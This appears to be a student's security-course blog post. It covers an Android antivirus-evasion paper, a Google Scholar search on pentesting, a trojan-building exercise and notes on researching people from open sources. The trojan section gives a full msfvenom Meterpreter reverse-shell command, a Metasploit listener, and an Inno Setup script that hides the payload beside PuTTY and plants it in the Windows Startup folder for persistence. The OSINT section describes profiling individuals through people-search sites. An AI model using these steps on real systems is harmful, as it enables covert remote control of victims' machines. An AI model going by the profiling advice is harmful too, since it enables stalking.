Read an article from Google Scholar. What did you learn?
I read “On the Evaluation of Android Malware Detectors (26.6.2018)” by Hassan Rafiq, Muhammad Aleem and Muhammad Arshad Islam.
The writers tested how well Android malware detectors cope with obfuscated malware. The test ran a number of commercial Android antivirus apps against previously known malware samples whose code had been obfuscated with various methods. The results, at least from the detection point of view, weren't great: it took, at most, a combination of three different obfuscation methods to get past any of the tested antivirus products.
What I found interesting in the article were the six different obfuscation methods tested:
- Variable renaming
- Package renaming
- Method renaming
- Garbage insertion
- Rebuilding
- Call indirection
The first three are pretty self-explanatory: rename the variables, packages (including the manifest file) and methods of the malware APK.
Garbage insertion means inserting useless code into the malware application, e.g. while-loops that the program never enters. The inserted code shouldn't affect the way the rest of the code works.
Rebuilding means taking the malware app, decompiling it and then recompiling it again. This changes the byte layout of the APK and therefore its hash, so it fools any detection that relies on hash signatures.
Call indirection means that a method call is moved into a new method, which is then called in place of the original call.
Based on this article it doesn’t seem that getting past antivirus software would be that difficult, especially when it contains parts like this:
“... we may conclude that the Norton antivirus is a hard nut to crack because it can only be evaded if complex obfuscation is applied to a malware sample i.e., a combination of variable renaming, method renaming, and package renaming”.
Now, I could be wrong or misunderstand something, but I don’t think renaming variables, methods and packages of an Android apk would be that hard to do.
The article also mentioned that similar tests were done with desktop malware detectors with similar results. It would be really interesting to try this out against PC antivirus software too.
Use Google Scholar to search a topic you’re interested in. What are the five first articles about? Make an alert out of the search.
I decided to stick with pentest and searched using “penetration testing” as the keyword. Unfortunately “penetration testing” is a bit too broad of a search, so I added a few other keywords: “hacking OR malware OR pentest OR virus "penetration testing"”. The results were a bit more accurate, so I used that to create the alert.
Sorted by date, the first five articles were:
This article is about cracking into wireless networks with Kali Linux. It goes through a cracking process and talks about different methods to use. Also, apparently, Kali is a pretty good environment for cracking wireless networks.
This one was a pretty basic introduction to penetration testing. The writers had also done some pentesting using OpenVAS and Nessus and talked about the differences between the two. It read more like an advertisement for the benefits of pentesting.
The article argues that WLAN technology is growing fast and will replace many wired connections. It discusses some vulnerabilities of wireless technology, for example to DoS, key reuse and downgrade attacks, and offers some suggestions for protecting against them.
This paper is about a study where a group of teenagers played a cyber security game designed for training undergraduates and professional penetration testers. It features realistic network infrastructure and pentest tools. Even though the game was challenging, 61% of the teenagers were interested in learning more about cyber security after the workshop. This suggests that introducing realistic cyber security tools to young people, instead of simplified ones, might be more beneficial.
Vehicles today are more and more connected to the internet, which means that threats to automotive software security are also a bigger and bigger concern. Hacking into a car remotely and taking control of its software is already a proven possibility.
The article suggests a hackathon where the goal is to break the existing vehicle software in a controlled environment. This would safely reveal the vulnerabilities in the software so that they could then be fixed.
Compile your own Trojan
I booted up a VirtualBox Windows 10 image I got from modern.ie. I downloaded and installed Inno Setup from http://www.jrsoftware.org/isdl.php and downloaded VLC from https://www.videolan.org/vlc/ because I wanted to tie the malware into a legitimate VLC executable. I also turned off Windows Defender.
Using MSFvenom within Kali Linux I created the payload and named it venom_malware.exe
sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.84 LPORT=4444 -e x86/shikata_ga_nai -i 10 -b "\x00" -f exe -o venom_malware.exe
I started Apache
sudo apache2ctl start
created a new folder in /var/www/html called “asd”, copied venom_malware.exe into it,
sudo cp venom_malware.exe /var/www/html/asd/
downloaded the file to the virtual Windows machine from http://<my ip>/asd/ and stopped Apache just in case
sudo apache2ctl stop
I then ran Inno Setup that I had previously installed on the virtual machine.
I decided to “Create a new script file using the Script Wizard”. I left every setting at its default until I got to the “Application Files” part. There I chose the VLC installer as the main executable and my venom_malware.exe payload as the other application file.
I then again left everything as is until Compiler Settings. I saved the output onto the desktop, named it vlc_malware_setup and clicked through the rest of the wizard. The vlc_malware_setup file appeared on the desktop.
Back at Kali, I set up Metasploit to listen for the connection
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.84
set lport 4444
exploit
and returned to the virtual machine.
I had to run the installer as an admin to get the VLC installer to start. VLC installed just fine but the Meterpreter wouldn’t connect. I tried to re-package the malware and VLC using venom_malware.exe as the main executable and VLC as the other application file. This time the VLC installation wasn’t anywhere to be seen but I got the Meterpreter connection when I launched the app that the installer spat out.
I thought that maybe the problem was that I was using VLC installer file so I downloaded 32 bit putty.exe from https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html and tried again with that. The results were the same.
It was at this point that I realized I had thought about this all wrong. I wanted to make the malware start when the user ran VLC (or PuTTY), but clearly the better choice was to make the malware run at system startup.
So I went through Inno Setup again. I used putty.exe as the main executable and venom_malware.exe as the other application file. I clicked “Edit”, picked “(Custom)” under the Destination base folder and typed in C:\programdata\Microsoft\Windows\Start Menu\Programs\StartUp. This time I didn't try to make the trojan launch at the same time as the installer or anything like that. It should only launch when Windows is restarted.
To test this I signed out and back in again, and after a couple of seconds the Meterpreter connection was established.
PuTTY probably isn't the best choice to couple the payload with, since it is a stand-alone executable. I think I could've maybe unpacked the VLC installer, slipped in the payload and repacked it to make my malware a little bit stealthier.
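For reference, this is roughly the Inno Setup script that the Script Wizard choices above correspond to (putty.exe as the main executable, the payload dropped into the all-users Startup folder). It is an added example, not the script generated in the original post: the source paths under C:\Users\user\Desktop\ and the AppVersion are assumptions. The point worth knowing is that Inno Setup has a built-in constant, {commonstartup}, for the folder that was typed in by hand above, and that writing to that folder needs administrative rights, so the installer declares PrivilegesRequired=admin and elevates itself instead of failing silently.

```iss
; Added example: Inno Setup script equivalent to the wizard choices described above.
; Not the script from the original post; source paths and AppVersion are assumptions.

[Setup]
AppName=PuTTY
AppVersion=0.70
DefaultDirName={pf}\PuTTY
DefaultGroupName=PuTTY
OutputDir=C:\Users\user\Desktop
OutputBaseFilename=vlc_malware_setup
; The all-users Startup folder is only writable with administrative rights,
; so ask for elevation up front rather than failing on the file copy.
PrivilegesRequired=admin
Compression=lzma
SolidCompression=yes

[Files]
; The legitimate program the user expects to get.
Source: "C:\Users\user\Desktop\putty.exe"; DestDir: "{app}"; Flags: ignoreversion
; The payload. {commonstartup} expands to
; C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp,
; so the file is run at every logon of every user (in that user's context).
Source: "C:\Users\user\Desktop\venom_malware.exe"; DestDir: "{commonstartup}"; Flags: ignoreversion

[Icons]
Name: "{group}\PuTTY"; Filename: "{app}\putty.exe"

[Run]
; Offer to launch the real program at the end so the install looks normal.
Filename: "{app}\putty.exe"; Description: "Launch PuTTY"; Flags: nowait postinstall skipifsilent
```

Compile it from the command line with ISCC.exe (ships with Inno Setup), or open it in the Inno Setup Compiler and press Compile; the result is the same installer the wizard produces, but the script can be reviewed and versioned. Because the payload runs from the Startup folder it only starts at the next logon, which matches the sign-out/sign-in test above; nothing in this script launches it during installation.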
In what ways can you find information about people using open sources
Ways to gather information using open sources:
- search engines: search for the name, online handle(s), email, phone number or anything else you already know
- social media, i.e. Facebook, Twitter, LinkedIn, Instagram etc.
- public records: tax records, criminal records, phone records, location
- reverse image search
Use all the info you find about your target to make more searches: jobs (past and present), education, hobbies, friends and family etc.
I also took a look at https://inteltechniques.com, a website with lots of different search tools. It uses United States public records, so it's quite USA-centric in parts, but things like Twitter and Facebook searches obviously work well even when looking for a person outside the USA.
I used the “NAME” section to look for information on an American person. I looked at a couple of the links, which took me to slightly suspicious-looking websites with lots of loading bars and buttons to click. Those sites like to make you wait while they “gather information” or “compile records” or whatever and ask for a credit card afterwards to view the info, but even without giving your credit card number, they tend to reveal quite a lot about a person.
- Lenovo Ideapad 720s
- Kali Xfce 64 live usb
- Intel Core i7-8550U
- GeForce MX150
- 8 GB RAM
- 500 GB SSD